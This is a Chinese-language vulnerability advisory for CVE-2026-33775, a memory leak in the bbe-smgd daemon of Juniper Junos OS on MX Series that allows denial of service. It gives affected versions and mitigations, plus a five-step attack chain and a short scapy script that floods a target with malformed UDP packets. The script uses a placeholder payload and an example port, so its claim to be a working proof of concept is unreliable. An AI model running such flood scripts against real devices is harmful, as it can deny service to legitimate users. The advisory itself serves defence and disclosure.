CVE-2026-33775 CVSS 6.5 中危

CVE-2026-33775 Junos OS bbe-smgd内存泄漏致DoS漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33775

漏洞类型

内存泄漏

CVSS评分

6.5 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Juniper Networks Junos OS (MX Series)

漏洞概述

Juniper Networks Junos OS (MX Series) 的宽带边缘用户管理守护进程 (bbe-smgd) 存在内存释放后未有效释放漏洞。当配置了身份验证数据包类型选项且收到不匹配的数据包时，会触发内存泄漏。未经身份验证的相邻攻击者可利用此漏洞耗尽系统内存，导致守护进程崩溃或资源耗尽，最终引发拒绝服务，阻止新用户登录。

技术细节

该漏洞位于Junos OS MX系列设备的宽带边缘用户管理守护进程（bbe-smgd）中。漏洞触发的根本原因是程序在处理认证数据包时存在资源管理错误。具体而言，当系统启用了“authentication packet-type”配置项时，bbe-smgd会校验入站包的类型。若校验失败，程序进入异常处理分支，但未能正确释放此前分配的内存资源。由于攻击者位于邻接网络（AV:A），无需认证（PR:N）即可持续发送此类构造错误的恶意数据包。随着攻击时间的推移，bbe-smgd进程的堆内存将被逐渐耗尽。当日志出现“Daemon Heap Memory exhaustion”时，表明资源已枯竭，此时系统将拒绝新的订阅用户登录，导致服务中断。

攻击链分析

STEP 1

侦察

攻击者识别网络中的Juniper MX Series设备，并确认其运行了受影响版本的Junos OS。

STEP 2

漏洞探测

攻击者分析目标配置，确认bbe-smgd是否启用了'authentication packet-type'选项（这是漏洞触发的必要条件）。

STEP 3

发送特制数据包

攻击者从邻接网络位置，持续向目标发送不符合预设认证数据包类型的伪造数据包。

STEP 4

资源耗尽

bbe-smgd进程在处理错误数据包时未能释放内存，导致内存泄漏持续累积，直至消耗尽所有分配的堆内存。

STEP 5

拒绝服务

当内存耗尽，bbe-smgd无法接受新连接，导致合法订阅用户无法登录，服务中断。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

from scapy.all import *
import time

# Configuration
# Target IP of the Juniper MX device
target_ip = "192.168.1.1" 
# Port used by bbe-smgd (Needs specific reconnaissance, example port)
target_port = 2000 
interface = "eth0"

def send_malicious_packet():
    # Construct a packet that does not match the expected 'authentication packet-type'
    # This simulates the trigger condition for the memory leak
    packet = IP(dst=target_ip)/UDP(dport=target_port)/Raw(load="MALFORMED_AUTH_PAYLOAD")
    
    print(f"[*] Sending packet to {target_ip}...")
    send(packet, iface=interface, verbose=0)

print("[+] Starting DoS simulation for CVE-2026-33775")
print("[!] This will consume memory in bbe-smgd if the vulnerability is unpatched.")

try:
    while True:
        send_malicious_packet()
        # Short delay to avoid flooding the network too hard, but enough to leak memory
        time.sleep(0.1)
except KeyboardInterrupt:
    print("\n[-] Attack stopped.")

影响范围

Junos OS on MX Series < 22.4R3-S8

Junos OS on MX Series 23.2 < 23.2R2-S5

Junos OS on MX Series 23.4 < 23.4R2-S6

Junos OS on MX Series 24.2 < 24.2R2-S2

Junos OS on MX Series 24.4 < 24.4R2

Junos OS on MX Series 25.2 < 25.2R2

防御指南

临时缓解措施

建议立即升级到Juniper发布的修复版本。如果无法立即升级，应密切监控bbe-smgd的内存使用情况（使用命令 `show system processes extensive | match bbe-smgd`）。此外，可以评估暂时禁用特定的认证数据包类型配置以阻断攻击向量，但这可能会影响正常的业务认证功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-33775
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-33775
3 Details https://www.cvedetails.com/cve/CVE-2026-33775/
4 VulDB https://vuldb.com/cve/CVE-2026-33775
5 Link https://kb.juniper.net/JSA107821

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表